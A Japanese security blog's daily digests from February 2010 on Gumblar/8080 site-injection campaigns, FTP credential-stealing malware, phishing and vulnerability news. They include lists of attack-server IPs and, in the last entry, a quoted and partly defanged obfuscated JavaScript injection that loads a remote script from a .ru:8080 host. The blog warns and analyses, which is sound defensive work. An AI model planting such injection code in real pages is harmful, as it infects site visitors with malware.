"With this JIT-spray, it works fairly reliably, so at least nine out of 10 times you'll guess the right position,"

視なかったことにしよう・・

"ASLR and DEP in IE 8 on Windows 7 provides a really good protection against these kinds of exploits,"

----------
iPhone PKI問題
とてもいやらしくて厄介なセキュリティの欠陥がiPhoneに見つかった
なるほど、どのへんが危険なのかというのがよくわかりました。
大量のiPhoneを全社規模で導入しているようなところは、ソフトウェアのアップデートに無線を使ってCAのコードサイニング証明を経てダウンロードさせる仕組みがあるようです。その mobileconfigを偽造することで、出所を“Apple Computer”にしたアプリケーションをインストールさせることができるっと・・

無線でのアップデートの仕組みそのものを考え直さなければならないようですので、結構大変そうです。

iPhoneユーザ諸氏は、オンラインでいきなりこんな画面が出たら気をつけましょう。

----------
Google and NSA
Google to enlist NSA to help it ward off cyberattacks
なんか、すごくイヤな取り合わせなんですが・・政治の話はこわいからヤメ

----------
8080
* NEW *
84.200.227.144 AS31400(ACCELERATED)
* NEW *
94.199.240.61 AS39023(IU-AS)

78.31.107.49 AS24931(DEDIPOWER)
94.23.199.154 AS16276(OVH Paris)
213.251.164.84 AS16276(OVH Paris)
77.68.44.169 AS15418(FASTHOSTS)
82.165.47.29 AS8560(SCHLUND)
87.118.90.76 AS31103(KEYWEB-AS)
217.160.110.21 AS8560(ONEANDONE-AS)

----------
Google Safe Browsing
| 1265313640 | B | [goog-black-hash 1.50322 update]
| 1265313602 | M | [goog-malware-hash 1.19132 update]
| 308160 | +8606(299554) ちょっ！
| 1322885 |
EoF

2010.02.04 木曜日

gnome — Thu, 04 Feb 2010 00:55:27 +0000

世界がんデー(World Cancer Day)

UICC (国際対がん連合) 日本委員会
2010年世界対がんデー（2月4日）のポスター

ぷよの日

ぷよぷよの語呂合わせから
当サイトでは、誤検知（が連鎖することから）の隠語となっています（笑）

銀閣寺の日

足利義政（室町幕府8代将軍）が、銀閣寺(慈照寺)の造営に着手した

スリランカ

1948年、イギリスから独立

北宋の建国

960年、趙匡胤が皇帝に即位。この擁立劇(陳橋の変)は、酒に酔った趙匡胤を軍人が無理矢理即位させたということになっている。

----------
R.I.P. apache 1.3
またこんなことを書くと何か飛んできそうですが・・・
Apache HTTP Server 1.3.42 released (final release of 1.3.x)
The Apache Software Foundation and the Apache HTTP Server Project are pleased to announce the release of version 1.3.42 of the Apache HTTP Server ("Apache"). This release is intended as the final release of version 1.3 of the Apache HTTP Server, which has reached end of life status.
これまで長い間ありがとうございました。
そういえば、最初に触ったApacheのバージョンっていくつだったかなぁ・・？
Upgrade to to the current 2.2 version as soon as possible. For information about how to upgrade, please see the documentation:
http://httpd.apache.org/docs/2.2/upgrading.html
現行サーバを apache 1.x で運用している方は、Apache 2.2 への移行を視野にいれたほうがいいでしょう。
現行の最終 stable は 2.2.14

Apache mod_proxy "ap_proxy_send_fb()" Integer Truncation Vulnerability 4
Apache HTTP Server 1.3's final update released
R.I.P. Apache 1.x: Apache 1.3.42 marks of end life

----------
[980088]
Security Advisory 980088 Released
じきに日本語も出るでしょうが
address a publicly disclosed vulnerability in Internet Explorer that may allow Information Disclosure for customers running on Windows XP or who have disabled Internet Explorer Protected Mode. At this time we are not aware of any attacks seeking to use the vulnerability.
WindowsXP+IE6で保護モードを OFF にしている場合、情報流出の恐れがあるとのこと。
リモートからローカルのファイルを盗み見れるということかな？

Vulnerability in Internet Explorer Could Allow Information Disclosure
Our investigation so far has shown that if a user is using a version of Internet Explorer that is not running in Protected Mode an attacker may be able to access files with an already known filename and location.
やっぱし・・・
Afficted softwareが IE8とかあるのはキノセイでしょうか？

とりあえず、（IE使ってる人は）保護モードになっていることを確認して様子見ですね

微妙に続く
----------
Microsoftからのおてまみ
Microsoft Support informs you…
日本国内でも多数着弾しているようです。
9462.officexp-KB910721-FullFile-ENU.zip
officexp-KB910721-FullFile-ENU.exe

MSがこういう形で不特定多数ユーザにメールを送ることはありません（そのための Microsoft Updateですので）

微妙に続く
----------
でもTwitterは
やっちゃったんですよね～
Twitterがパスワード変更を促すメール、フィッシング詐欺で流出か
今後のセキュリティ・フィッシング対策として、一石を投げかける事態だと思うんですが、一般的にはあまり騒がれていません。

というか、こんな原因だったとは・・
Twitter攻撃の原因は Torrentサイトの裏口だった
Twitterが調べたところ、ここ数年来何者かがTorrentサイトを作り、Torrentサービス始めようとする人相手にサイトを売っていたことがわかった。問題は、この人物がサイトに裏口を仕掛けておき、そこが人気サイトになった時に侵入できるようにしていたらしいことだ。多くの人たちがウェブ上で同じIDとパスワードを使い回しているために、このデータによって大量のTwitterアカウントが漏えいした。
・・・・・・・・

Reason #4132 for Changing Your Password

----------
週間脆弱性 2010.02.01
チェックしておきたいぜい弱性情報＜2010.02.01＞ BGM

Internet Explorerのセキュリティ・アップデート（定例外）（2010/01/22）
米アドビシステムズ Shockwave Player 11.5.6.606リリース（2010/01/19）
米アップルセキュリティ・アップデート2010-001（2010/01/19）
RealPlayerのアップデート（2010/01/19）
米シスコ Cisco IOS XRのSSH処理にサービス不能のぜい弱性（2010/01/20）
米シスコ CiscoWorks Internetwork Performance Monitorにバッファ・オーバーフローのぜい弱性（2010/01/20）
Firefox 3.6、Thunderbird 3.0.1リリース（2010/01/21）
キヤノンITソリューションズ製ACCESSGUARDIANにXSSのぜい弱性（2010/01/13）

Firefox 3.6は自動ではupdateされませんので注意しましょう。
Firefox 3.0系のライフタイムは、2010 年 2 月で切れます。

----------
ガンブラーはFTPの夢を見るか
というより、FTP(RFC959)というプロトコルそのものを破滅に追い込もうとしていますが・・・
コンピュータウイルス・不正アクセスの届出状況[1月分]について
1. 今月の呼びかけ
「 "ガンブラー" の手口を知り、対策を行いましょう」
英語の長文読むよりも疲れる・・・・

で、puppet様のとこ行ってコーヒー吹きました。
いろいろ
確かに、この位置関係だと加害者ですね（笑）

個人的に、gumblar/Gumblar.x/8080 の一番の恐ろしいところは、攻撃者が勤勉すぎる点だと思っています。アクセス先、インジェクション先、送付先、ホスティング、スクリプトをコロコロ手を変え品を変え攻撃してくるので、対処側が追いついてないのです。かといって、検出ルーチンを強化すると、ぷよってしまうので、セキュ会社も頭が痛いでしょうね。

ちなみに、FTPのパケットモニタリングは gumblar/Gumblar.xにもあった機能ですが、FTPの環境保存ファイルやレジストリからの直接奪取は 8080/QuickSilverの機能であり、Gumblar.Xにも確認されていません。
「FFFTP」をやめてもガンブラーウイルス対策にはならない -- 無題なブログ
このような点から見ても、そろそろ区分をきちんとしないと危険な側面がでてきそうですけど、
ま、

nobody cares .. こまけーことはいいんだよ

という精神でいきましょうかね

参照：
サイト改ざんでウイルス感染を広げる「ガンブラー」対策を～IPAが呼びかけIPAは、「ガンブラー」という言葉を、「Webサイト改ざん」と「Webサイトを閲覧するだけで感染させられてしまうウイルス」を組み合わせ、パソコンにウイルスを感染させようとする一連の手口（攻撃手法）を指すものと定義。その手口を詳しく解説している。
なんとなく、「」が多いあたりに皮肉を感じてしまうのは穿ち過ぎなんでしょうね。
NRIセキュア、「Gumblar」の感染発見に有効なマルウェア検知サービスを提供開始
同サービス」の提供価格は、監視サーバ1台あたり月額36万8000円（税別）。
フォーティネットウイルス対処状況レポート (2010年1月度)
1月のウイルス状況、トップの「Gumblar」に加え「Aurora」も猛威－フォーティネット調べ
ウイルスの活動量によるトップ10では、1位にウェブ改ざんで話題となっている「Gumblar.Botnet」がランクイン。全体の攻撃割合は 31.3％に達した。同レポートによれば、Gumblarは1月6日以降を境に、一気に活動を広げていた。

----------
偽Firefoxアップデートには・・・
Fake Firefox site bundles undead adware
Fake Firefox Update Pages Push Adware
Victims of this scam install the “Hotbar” toolbar by Pinball Corp, formerly Zango.
おまえかっ（笑）

----------
WoWもトークン導入に
Blizzard warns of account theft in World of Warcraft
FFXIには既に導入されているワンタイム･パスワード発行のセキュリティ・トークンですが、世界最大規模で、フィッシングも最大規模な WoWにも導入されるようです。

そして、何個もじゃらじゃ・・

----------
シグネチャ･不正コピー
クラウド上で“カジュアル・コピー”が横行？
スルーカ権行使！

Killing Antivirus, One DLL At A Time

----------
Pushdo Rampages
Pushdo SSL DDoS Attacks
まだ続いている様子

----------
ZeuSも元気いっぱい
Minipost: Fake Photo Zeus -- GarWarner
PhotoArchive.exe7/40 (17.50%)

PhotoArchive Crimeware/Client-Side Exploits Serving Campaign in the Wild -- ddanchev
ZDnetでおなじみの、Dancho Danchev氏は pushdoとの関連も指摘しています。

and ! Happy Birthday !
Happy Birthday ZeuS Tracker!
During the last year, ZeuS Tracker has tracked more then 2′800 malicious ZeuS C&C servers. The ZeuS Tracker has captured more then 360MB ZeuS config files and 330MB binaries.
also Thanks 1und1

----------
MiFi cracked
Verizon MiFi Device Hacked
長い・・
Fortunately, there are a couple of options available to us to mitigate this attack.
* Change the Default PSK
* Change the Default SSIDC
Mifi : myWiFi

----------
Conficker掃討作戦
in マンチェスター警察
Manchester cops recover from Conficker
It is still not clear where the virus has come from but we are investigating how this has happened and are taking steps to prevent this from happening again.
感染経路は不明っと
The council infection of February wound up costing taxpayers £1.5m in lost parking ticket revenue and security clean-up fees.

----------
反撃
Adobe strikes back at Apple over iPad/Flash debacle
Open Access to Content and Applications

どっちもセキュリティホールを掘るのは得意なんですけどね・・・

----------
malcode with WordPress
Wordpress obfuscated javascript pointing to centiyo mal
ああ・・どっかでみたコードがっ（笑）

----------
沿革
8080系(いわゆるガンブラー系)記事のまとめ
結論：あるふぁぶろがーこわい
怖い怖い・・・
錬勤術のほうも気をつけましょうね（気をつけようがないのかっ！）
※手当てなしの勤務の場合はなんて呼ぶのかな（苦笑）

----------
8080
66.225.192.2 AS23352(SERVERCENTRAL) IL(Chicago)
83.1.83.4 AS5617(Polish Telecom)
200.35.148.184 AS15083(INFOLINK) FL
213.39.123.11 AS8928(INTEROUTE)
83.222.30.178 AS25532(MASTERHOST)
88.255.162.14 AS9121(TTNET)
212.146.105.75 AS5606(KQRO)
87.118.90.76 AS31103(KEYWEB-AS)

激しく攻撃サーバホスティングの変更が行われました。
というか勤勉にも程が・・

----------
Google Safe Browsing
| 1265227216 | B | [goog-black-hash 1.50250 update]
| 1265227201 | M | [goog-malware-hash 1.19108 update]
| 299554 | +6032(293522) 反転
| 1310611 |
EoF

[NOTICE] がんぶらー'ed される FTP list

gnome — Wed, 03 Feb 2010 12:00:28 +0000

FTP アカウント情報を盗むマルウエアに関する注意喚起
このアカウント窃取の対象となるソフトウエアは、FTP クライアントを含む複数の製品にのぼります。JPCERT/CC では、以下の FTP クライアントにてマルウエアによるアカウント窃取、および外部サーバへのアカウント情報の送信を確認しました。

- ALFTP 5.2 beta1
- BulletPloof FTP Client 2009.72.0.64
- EmFTP 2.02.2
- FFFTP 1.96d
- FileZilla 3.3.1
- FlashFXP 3.6
- Frigate 3.36
- FTP Commander 8
- FTP Navigator 7.77
- FTP Now 2.6.93
- FTP Rush 1.1b
- SmartFTP 4.0.1072.0
- Total Commander 7.50a
- UltraFXP 1.07 ※公式サイト http://www.ultrafxp.com 消失
- WinSCP 4.2.5

上記に加えて、以下の Web ブラウザのアカウント管理機能を用いて保存され
ている情報をマルウエアが窃取し、外部サーバに送信している事を確認しまし
た。

- Microsoft社 Internet Explorer 6
(Internet Explore 7 および 8 ではアカウント窃取は確認されておりません)
- Opera社 Opera 10.10

JPCERT/CCが、自信を持って名指ししてますので、十分に検証したのでしょうネ。
以前に Unmask Parasitesが挙げた「使用すべきでない10のFTPクライアント」と比較すると、さらに使用すべきでないFTPクライアントが増えてしまいます。

こうなると、印象的に安心して使える FTPクライアントがすごく限られてしまうような・・・

何度も言っているように、まずは「感染しないこと」が重要なのは言うまでもありません。

※どっちのマルウェアの検証結果なのか謎ですが、恐らくは 8080/QuickSilver のことを指していると思われます

------
結果的に、key(id_rsaなど）を登録できる環境下にあるなら　FTP を捨て、SFTP(SSH L2) による鍵認証+パスフレーズが一番いいような気がしてきました。
公開鍵認証と認証エージェントを併用する
FileZilla 側には一切パスワードを入力せずに接続できるようになります。

これなら FileZillaでも、WinSCPでもOK・・・かな
問題は 22 番をどこか別のPortに移動して、shellを抑制する(rsshなど）をきちんと設定することですが・・

2010.02.03 恵方巻

gnome — Wed, 03 Feb 2010 00:13:07 +0000

slugは冗談ですので、本気にしないでね（苦笑）

節分
のり巻きの日

1987年、全国海苔貝類漁業協同組合連合会が制定

大岡越前の日

1717年2月3日に、大岡忠相が南町奉行に就任した。

チューリップ・バブル崩壊。(1637)
オープンソース誕生の日 (1998)

History of the OSI
The 'open source' label was invented at a strategy session held on February 3rd, 1998 in Palo Alto, California

----------

今日は、大きな話は無いんですが、細かいのが沢山・・・

----------
C.I.A
C.I.Aサイバー・インテリジェント・エンジェルズ
presented by TBS, Microsoft and Yahoo

秘密組織“C.I.A”がネットの平和を守る！---TBSなど3社が情報セキュリティ啓発キャンペーン
中高生に情報セキュリティを知ってもらおう――MSとTBS、ヤフーが始動
小野寺さんは脱がないのかっ（笑）
サイバー・インテリジェント・エンジェルズ
ネットの安全特集2010春
インターネットと情報セキュリティの基礎知識

２月は情報セキュリティ月間です。
スルー力を発揮して、余計なことそれにしてもすごいコラボ・・・は言わないでおこう・・

----------
MASS Password Reset via Twitter
@safety
Got an email from us saying we've reset your password? A small # of accts seemed possibly affected offsite & we took a precautionary step.
ご注意―Twitter、フィッシング攻撃を受けたと認める
Twitter Mass Password Reset due to Phishing
フィッシングではなく本当にパスワード変更が行われています。
メールがやってきた方は、まずメールを破棄、以下のサイトからパスワードの変更を行ってください。
https://www.twitter.com

do not reuse the password, do not use a simple password scheme (like "twitterpassword" and "facebookpassword")
also don't "123456" and similar =) and of course not "password"

関連：
Most consumers reuse banking passwords
Online security firm Trusteer reports that 73 per cent of bank customers use their online account password to access at least one other, less sensitive website. Even worse, around half (47 per cent) use the same online banking username and password for other website logins.
Reused Login Credentials

----------

About the security content of iPhone OS 3.1.3 and iPhone OS 3.1.3 for iPod touch
Code execution holes in iPhone OS, iPod Touch
The most serious flaw could allow remote code execution if an iPhone/iPod Touch user opens audio and image files.

This iPhone/iPod Touch update is only available through iTunes and will not appear in the software update utility available in Mac and Windows systems.
iPod Touchは無償で受けられるのかな？

続く
----------
iPhone Certの脆弱性？
iPhones Vulnerable to New Remote Attack
ナナメ読みなのでアレですが、
Appleのroot CAが iPhone用とその他でIDが違うと、違う証明書発行元(CN)、違うシリアル番号なのに、KeyIDが同じっては、同一の証明書をIDだけ変えて使い回ししてるんじゃない？
という話かな？
即、リモートコード実行や、不正規なソフトの自動アップグレードにつながる性質のものでは無いようですが、何とも言えない脆弱性（？）ですね・・
"You can make any part of the phone not work. You definitely don't get to run code, but there's lots of nasty things you can do. You can make applications not work, make it so that you can't remove this config file," Miller said. "At the very least, you can make someone's day miserable."

ソース：匿名のpost
iPhone PKI handling flaws -- Cryptopath

微妙に続く
----------
Koobface thru MacOS
How the Koobface Gang Monetizes Mac OS X Traffic
MacOSからのアクセスだけを別の場所に飛ばすKoobfaceの新手法
MacOS系のウィルス・マルウェアはあまり聞かないですが、こういった形でアフィ踏み台になってる人は意外と多いのかも？

AS9394(CRNET-CHINA RAILWAY)
相変わらず、謎なBGP運用してるなァ・・

こっちはウクライナの（偽）デートサイト
62.90.136.237 AS1680(NV-ASN 013)

アクセスログにこういったのが残っていたら注意しましょう。

----------
Pushdo rampage continues
Pushdo Update
続いているようですね・・国内の感染ノードも存在するようですので、注意しましょう（どうやって！？）
※自自律系の中に 443を撃ちまくってるノードが無いか確認カナ

----------
Conficker
Manchester cops clobbered by Conficker
Greater Manchester Police's computer network has been infected by the infamous Conficker worm, leaving beat cops unable to run computer checks on suspected criminals and vehicles for the last three days.
やっぱりまだ居るんですね・・
天然痘とか、コレラみたいな印象ですが・・・

Conficker cause of Greater Manchester Police disconnection
Conficker virus hits Manchester Police computers

----------
イカ君
Squid update fixes DoS vulnerability
Squid DNS Packet Processing Denial of Service Vulnerability 2
Squid DNS Packet Processing Denial of Service Vulnerability 2
Update to Squid 3.0.STABLE22 or apply patch.

----------
WordPress
Wordpress injection attack and “affiliate ping-pong”
激しく既視感のあるインジェクションコードですね・・

WordPressの現行バージョンは 2.9.1 です
なのですよ！ > ATWORDさん

----------
？
On the Trustworthiness of the AV Industry and AV Tests
で・・？（とか書くと、またあちこちで物議を醸すのカナ？）

AMTSOに権限をもっと持たせろ！という点にだけは賛成！

----------
オンラインヘルプにご注意
Be careful on help files
Earlier variants of “Muster” drop encoded copies of main backdoor components in filenames with the extension “.hlp”. These “.hlp”files are later decrypted with Microsoft CryptAPI with hardcoded keys and executed by loaders.
“upgraderUI.exe”with the registry key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run AutoPatch

----------
Zimuse
Password-Protected Word Document In W32.Zimuse
こないだの、チェコ語のパズルウィルスですね

----------
やばい！
Anatomy of a free Starbucks gift card scam
コーヒー狂な（私）人は、こーいうのに引っかかってしま・・・わないですよね（苦笑）
スタバだとちょっと開きそうだなとか思ったのは内緒

----------
P2P共有
年末年始のP2P（つづき）
減ってるのか、減ってないのか・・
喉元すぎれば・・とか言いますしね～

----------
ああ GreaseMonkey
Firefox出し抜かれる。Greasemonkeyの作者が、Chromeにネイティブサポートを追加
TechCrunchの見出しは相変わらず上手いナァ

----------
Flashホール？
Adobe Flash Security on Menu at Black Hat
抽象的なので、なんとも・・
「Adobeですから」、で終わってしまいそうな今日この頃・・

----------
もぐら叩きの果てに・・・
第13回「脆弱性根絶なんてできっこない」と嘆く前に
私は前職で、日本で初めて「セキュリティの脆弱性検査」を事業として立ち上げた経験があるのですが、始めた当初から「セキュアなプログラミングが普及すれば脆弱性検査の市場はなくなる」と考えていました。しかし、脆弱性検査はすっかり定着して、不況にもかかわらず、市場規模は縮小する気配がありません。
いま、一番儲かるとこですしね・・（嘆息）
※ムシられる側の愚痴です、ええ・・

関連？
名古屋市長が住基ネットの侵入実験を構想「今ならもっと面白い実験ができる」
「オープンソースの注意点」、オープンソースを利用する際はまず開発企業を調べろ？
私もわかりません・・

----------
ふむ～
ベネッセが中高生に「安心・安全に携帯電話を使う」ためのサービスを提供
ベネッセモバイル FREO

自ら決めたルールの中に、本当の自由はある
このコピーはちょっと感心しました。

----------
な・・なんじゃこりゃ
URGENT! Help needed w/ Virus
また新しいタイプですね・・・
デコードする時間がなかったのでこのまま・・

----------
AS47560
trojan Gozi?
search:47560
91.200.164.44 AS475601(VESTEH)
なんか IDSに引っかかってたらしいので、注意喚起です。

----------
8080
78.31.107.49 AS24931(DEDIPOWER)
82.165.47.29 AS8560(SCHLUND)
94.23.199.154 AS16276(OVH Paris)
*NEW(2010.02.02 23:00 +9 JST)
188.40.118.68 AS24940(HETZNER)
213.251.164.84 AS16276(OVH Paris)

１個 NEW IP/ISP が発生・・・って NETZNERか・・

----------
Google Safe Browsing
| 1265140838 | B | [goog-black-hash 1.50178 update]
| 1265140802 | M | [goog-malware-hash 1.19084 update]
| 293522 | -1271(294793) なんとなく膠着状態・・
| 1302894 |
EoF

2010.02.02 火曜日

gnome — Tue, 02 Feb 2010 00:18:25 +0000

キャンドルマス/聖母マリアの潔めの祝日

聖母マリアが産後の汚れの潔めの式を受け，幼子イエスが律法に従いエルサレムの神殿に捧げられた日に相当する。この日でクリスマスシーズンが終わり、クリスマスツリー等を燃やす。受胎告知の日と混同されることがある。

グラウンドホッグデー

影（天気）	グラウンドホッグの行動	占いの結果
あり（晴）	影を見て驚き、冬眠していた巣穴に戻る	「冬はあと6週間は続くだろう」
なし（曇・悪天候）	影を見ず、そのまま外へ出る	「春は間近に迫っている」

国際航空業務再開の日

戦後禁止されていた国際航空業務が1954年に再開。1番機は日本航空の(JAL)の東京発ホノルル経由サンフランシスコ行きで、38席のうち、招待客が14人、一般の乗客は5人。

バスガール（バスガイド・車掌を参照）の日
頭痛の日

「2(ず)」「2(つう)」

----------
情報セキュリティの日
2月は「情報セキュリティ月間」です
内閣官房をはじめとして、関係省庁及び政府関係機関では２月を「情報セキュリティ月間」として、情報セキュリティの向上について、関係行事の実施等集中的に行うこととしています。
（「情報セキュリティ月間」の詳細については、内閣官房情報セキュリティセンターのホームページをご覧下さい。）

内閣官房長官のメッセージ
安心・安全にインターネットを使うためには、まず最初に、次のことに気をつけて頂ければと思います。
　・ウィルス対策ソフト等を導入し、定期的に更新して最新の状態に保つこと
　・基本ソフト（ＯＳ）を始め各種ソフトを定期的に更新し、最新の状態に保つこと
　・パスワードは、容易に推測できないものとし、他人には知らせないこと

内閣・・・のページはPDFだらけなので割愛します。

こっちのほうがイイですね。
第5回 IPA 情報セキュリティ標語・ポスターコンクール　入選作品一覧
こういう機会を元に、小学校あたりから教育を始めることが重要です。が・・その「テキスト」の作成、監修は非常に重要になるでしょう。

RSA:
情報漏洩予防で守るべき5カ条--RSAセキュリティ提唱

----------
IE6は本当に死ぬのか？
グーグル、IE 6のサポートを打ち切りへ
Modern browsers for modern applications

Microsoft Internet Explorer 7.0+
Mozilla Firefox 3.0+
Google Chrome 4.0+
Safari 3.0+

あれ？・・？　なにか無い気もするけど・・まいっか（笑）

一方で、英国政府は IE6を排除しないと発表
UK.gov unmoved by Internet Explorer 6 security concerns
暗に、フランス・ドイツを牽制してるのか？　大人の事情なのでしょうね。
でも、政府機関の一部は・・
DoH tells NHS to dump IE6
In a technology bulletin published by the department's informatics directorate on 29 January 2010, it advised NHS trusts using Microsoft Internet Explorer 6 on either Windows 2000 or Windows XP to move to version 7 of the browser.
NHS : 英国営医療サービス事業
※Windows2000って IE7対応してましたっけ？

一方、Cnetではこんな論調
Petition urges U.K. government to dump IE 6
It's time for the United Kingdom government to scrap Internet Explorer 6, upgrading away from the browser introduced in 2001 and the problems it brings now, according to a petition submitted Monday.
Petition to: encourage government departments to upgrade away from Internet Explorer 6.という、電子嘆願書の受付も行われているので、内部で意見が分かれているのでしょう。

いずれにせよ、IE6はもう枯れたプラットホームというのが一般的な考え方ではないでしょうか？

----------
Mac vs Windows
またそのネタか！と怒られそうですが・・
In their words: Experts weigh in on Mac vs. PC security
長文すぎるので、適当にナナメ読み・・
コメントがすごい

----------
その他

時間切れ：
UKの記事をじーっと眺めていたら半分寝てました（苦笑）

Now You See Me, Now You Don’t
Backdoor.Tidserv.K
どっかでみたランダム数字+.cn のヤツですね
最近、.cnは少なくなった印象があるのですけどね。
※.cnだから中国ではなく、.plだから~~ペルー~~ポーランドでもありませんけど・・・
orz....

Spam using Twitter and Youtube
なんでもかんでもクリックするな！と、標語でも言われてるじゃないですか（笑)

Malicious Google Job Application Response
CV-20100120-112.zip.exe ですね・・・
CV-20100120-112.zip 10/40 (25.00%)

そういえば、KasperskyがVTを微妙に牽制してますね
On the way to better testing
This is why a German computer magazine conducted an experiment, and the results of this experiment were presented at a security conference last October: they created a clean file, asked us to add a false detection for it and finally uploaded it to VirusTotal. Some months later this file was detected by more than 20 scanners on VirusTotal. After the presentation, representatives from several AV vendors at the event agreed that a solution should be found. However, multi-scanner based detection is just the symptom - the root of the problem is the test methodology itself.
クリーンなファイルをKasperskyに誤検知するように依頼した雑誌のテストで、そのファイルが VirusTotal にアップされ、その結果をみて他のベンダーも検出するようになり、いつのまにかマルウェアとして定着してしまった・・のかな？
この前の、GoogleAdSenseの誤検知でも、他社に飛び火してましたしね（笑）

日本オラクルが覆したい「DB性能のボトルネックはCPU」という都市伝説
日本オラクル、「クルクルキャンペーン」でRAC構成も半額以下に
オラクルクルクルキャンペーンでは、「オラクル、安くクル、5年クル」をキャッチフレーズに、4つのパッケージを用意する。いずれも、5年間の使用が認められる期間限定ライセンス（5 Year Term Licence）が設定される。
ネーミングセンスに関しては、敢えて何もいいますまい・・

Britain warns businesses of Chinese 'honey trap'
お国柄ですよね？

Early Hearts’ Day Presents from Spammers
CONGRATULATIONS!（笑）

国内でも急増するフィッシング詐欺、対策は？
フィッシング詐欺は海外で多発しており、多数のセキュリティベンダーが製品やサービスを提供しているほか、Internet ExplorerやFirefox、SafariなどのWebブラウザには詐欺サイトを検出する仕組みが実装されている。しかし小宮山氏が独自に調べたところ、Webブラウザの検出機能は海外の不正サイトデータでは9割以上を検知できたが、国内で入手したデータではほとんど検出できなかったという。

Multiple vulnerabilities in VMware products
[Security-announce] VMSA-2010-0002 VMware vCenter update release addresses multiple security issues in Java JRE
VMware Products JRE Multiple Vulnerabilities 4
VMware VirtualCenter JRE Multiple Vulnerabilities 4

NMAP 5.21 - Is UDP Protocol Specific Scanning Important? Why Should I Care?
UDPパケットをより正確に解析できるようになったというお話
Nmapもそろそろ使ってみないといけないけど、WireSharkで精一杯（笑）

----------
8080
*New IP*
87.106.129.220 AS8560(SCHLUND)
*New IP* オカエリ・・
94.23.199.154 AS16276(OVH Paris)
213.251.164.84 AS16276(OVH Paris)
77.68.44.169 AS15418(FASTHOSTS)
82.165.47.29 AS8560(SCHLUND)
78.31.107.49 AS24931(DEDIPOWER)

----------
Google Safe Browsing
| 1265054414 | B | [goog-black-hash 1.50106 update]
| 1265054403 | M | [goog-malware-hash 1.19060 update]
| 294793 | -1320(296113)
| 1300563 |
EoF

[ATTENTION] 8080 変更（再々・・・）

gnome — Mon, 01 Feb 2010 15:41:25 +0000

This must be yet another revision

またか～と頭が痛くなりますね
アンチウィルスソフトに引っかかると、GoogleBlockされる（笑）可能性がありますので、以下の変更を行っています。
( → （
) → ）
/ → ／

try{window.onload=function（）{Iebf2d21q07z = '' + 'i）c（#i$b）!a&$-$（c$（））o&）m（（.@c&）!o&（@n（&s!）（t@!#a）n@!!t（@&（@c^$^#o^#n&t!a&&c!t（.!#（c（&@^o））$^m#&&.@&p@e@）^r&e#@）$z@h#（i!l!#^t（（@o@n!@@^-#$^c）^（o（&m）.#（b^i）$l&$（&!t$o^&!p^&.@&#&r!（u$:@））N#q#@5#（^b!（&@h$3）f&@）i#@t&$w&!1@r$#v!$／!&@$g####o（$@&&o（g$l）@!e@$.@（c$$
（）o&m&.$@（a^u!／^##g））（）o#^o#&#g$#l!^）e$$.&#c!o（$@m（$.!^^a!u）^!／@!t#$@o（（$r（!#r&（&e#^n$t^@^$s!&$^.（@r#!@u）$#&／（a@$l$#l!（e!^g$）（r&$#）o$^&.^p（）l!）^@／#$$##g#$o）@$o）$#^g（&l（e@.#!c&o&@m$#／^
'.replace（／#|@|\^|\$|\!|&|\）|\（／ig, ''） ;
Jq2dz9nff1w0lm = 'appendChild';Rkn5tmljhj1c = d ocument.createElement（'sc'+'ript'）;
Rkn5tmljhj1c.src = 'h'+'ttp:／／'+Iebf2d21q07z.replace（／Nq5bh3fitw1rv／g, '8080'）;Rkn5tmljhj1c.setAttribute（'defer', 'def'+'er'）;e val（'document.body.'+Jq2dz9nff1w0lm+'（Rkn5tmljhj1c）'）;} } catch（P052l4jn ） {}

decode:
iciba-com.constantcontact.com.perezhilton-com.biltop .ru:8080/google.com.au/google.com.au/torrents.ru/allegro.pl/google.com/

また、散布ISPにも変動があり、
77.72.25.34 AS44062(TESENE)
83.168.238.66 AS35041(NET-CRYSTONE)
の２者が参戦しています。

どこまで勤勉なんでしょうね・・・